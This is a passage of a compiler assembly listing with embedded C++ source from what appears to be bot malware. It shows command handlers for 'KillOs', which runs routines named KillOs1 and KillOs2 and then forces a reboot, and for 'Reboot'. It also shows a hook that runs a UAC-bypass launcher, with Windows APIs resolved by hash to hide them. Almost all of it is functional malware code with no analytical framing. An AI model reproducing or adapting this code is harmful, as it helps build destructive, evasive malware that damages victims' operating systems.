  000c2	5f		 pop	 edi
  000c3	5e		 pop	 esi
  000c4	5b		 pop	 ebx
; 79   : }
  000c5	c9		 leave
  000c6	c3		 ret	 0
?KillOs2@@YA_NXZ ENDP					; KillOs2
_TEXT	ENDS
PUBLIC	?Reboot@@YAXXZ					; Reboot
; Function compile flags: /Ogspy
;	COMDAT ?Reboot@@YAXXZ
_TEXT	SEGMENT
_OldValue$ = -4						; size = 4
?Reboot@@YAXXZ PROC					; Reboot, COMDAT
; 94   : {
  00000	51		 push	 ecx
; 95   : 	BOOL OldValue;
; 96   : 	if (NT_SUCCESS(pRtlAdjustPrivilege(SE_SHUTDOWN_PRIVILEGE, TRUE, FALSE, (PBOOLEAN)&OldValue)))
  00001	8d 04 24	 lea	 eax, DWORD PTR _OldValue$[esp+4]
  00004	50		 push	 eax
  00005	6a 00		 push	 0
  00007	6a 01		 push	 1
  00009	6a 13		 push	 19			; 00000013H
  0000b	e8 00 00 00 00	 call	 ??$pushargEx@$04$0MCKGLBKO@$0BJO@JHHPAE@@YAPAXJHHPAE@Z ; pushargEx<5,3265704366,414,long,int,int,unsigned char *>
  00010	83 c4 10	 add	 esp, 16			; 00000010H
  00013	85 c0		 test	 eax, eax
  00015	7c 0b		 jl	 SHORT $LN1@Reboot
; 97   : 	pExitWindowsEx(EWX_REBOOT | EWX_FORCE, 0);
  00017	6a 00		 push	 0
  00019	6a 06		 push	 6
  0001b	e8 00 00 00 00	 call	 ??$pushargEx@$02$0KNHAEDKE@$0BAK@HH@@YAPAXHH@Z ; pushargEx<3,2909815716,266,int,int>
  00020	59		 pop	 ecx
  00021	59		 pop	 ecx
$LN1@Reboot:
; 98   : }
  00022	59		 pop	 ecx
  00023	c3		 ret	 0
?Reboot@@YAXXZ ENDP					; Reboot
_TEXT	ENDS
PUBLIC	?ExecuteRebootCommand@@YA_NPAXPAD1@Z		; ExecuteRebootCommand
; Function compile flags: /Ogspy
;	COMDAT ?ExecuteRebootCommand@@YA_NPAXPAD1@Z
_TEXT	SEGMENT
_Manager$ = 8						; size = 4
_Command$ = 12						; size = 4
_Arguments$ = 16					; size = 4
?ExecuteRebootCommand@@YA_NPAXPAD1@Z PROC		; ExecuteRebootCommand, COMDAT
; 117  : 	// 
; 118  : 	Reboot();
  00000	e8 00 00 00 00	 call	 ?Reboot@@YAXXZ		; Reboot
; 119  : 	return true;
  00005	b0 01		 mov	 al, 1
; 120  : 
; 121  : }
  00007	c3		 ret	 0
?ExecuteRebootCommand@@YA_NPAXPAD1@Z ENDP		; ExecuteRebootCommand
_TEXT	ENDS
PUBLIC	?KillOs@@YA_NXZ					; KillOs
; Function compile flags: /Ogspy
;	COMDAT ?KillOs@@YA_NXZ
_TEXT	SEGMENT
?KillOs@@YA_NXZ PROC					; KillOs, COMDAT
; 82   : {
  00000	53		 push	 ebx
; 83   : 	bool res = KillOs2();
  00001	e8 00 00 00 00	 call	 ?KillOs2@@YA_NXZ	; KillOs2
  00006	8a d8		 mov	 bl, al
; 84   : 	if( KillOs1() ) res = true;
  00008	e8 00 00 00 00	 call	 ?KillOs1@@YA_NXZ	; KillOs1
  0000d	84 c0		 test	 al, al
  0000f	74 02		 je	 SHORT $LN2@KillOs
  00011	b3 01		 mov	 bl, 1
$LN2@KillOs:
; 85   : 	if( res )
  00013	84 db		 test	 bl, bl
  00015	74 05		 je	 SHORT $LN1@KillOs
; 86   : 	{
; 87   : 		DBG( "KillOs is success" );
; 88   : 		Reboot();
  00017	e8 00 00 00 00	 call	 ?Reboot@@YAXXZ		; Reboot
$LN1@KillOs:
; 89   : 	}
; 90   : 	return res;
  0001c	8a c3		 mov	 al, bl
  0001e	5b		 pop	 ebx
; 91   : }
  0001f	c3		 ret	 0
?KillOs@@YA_NXZ ENDP					; KillOs
_TEXT	ENDS
PUBLIC	?ExecuteKillosCommand@@YA_NPAXPAD1@Z		; ExecuteKillosCommand
; Function compile flags: /Ogspy
;	COMDAT ?ExecuteKillosCommand@@YA_NPAXPAD1@Z
_TEXT	SEGMENT
_Manager$ = 8						; size = 4
_Command$ = 12						; size = 4
_Arguments$ = 16					; size = 4
?ExecuteKillosCommand@@YA_NPAXPAD1@Z PROC		; ExecuteKillosCommand, COMDAT
; 102  : 	DBG( "Execute cmd KillOs" );
; 103  : #ifdef UAC_bypassH
; 104  : 	if( BOT::GetBotType() == BotBypassUAC ) //
; 105  : 		return KillOs();
; 106  : 	else
; 107  : 		if( !RunBotBypassUAC( 0, 1, 0 ) )
; 108  : 			return KillOs();
; 109  : 		return true;
; 110  : #else
; 111  : 	return KillOs();
  00000	e9 00 00 00 00	 jmp	 ?KillOs@@YA_NXZ		; KillOs
?ExecuteKillosCommand@@YA_NPAXPAD1@Z ENDP		; ExecuteKillosCommand
_TEXT	ENDS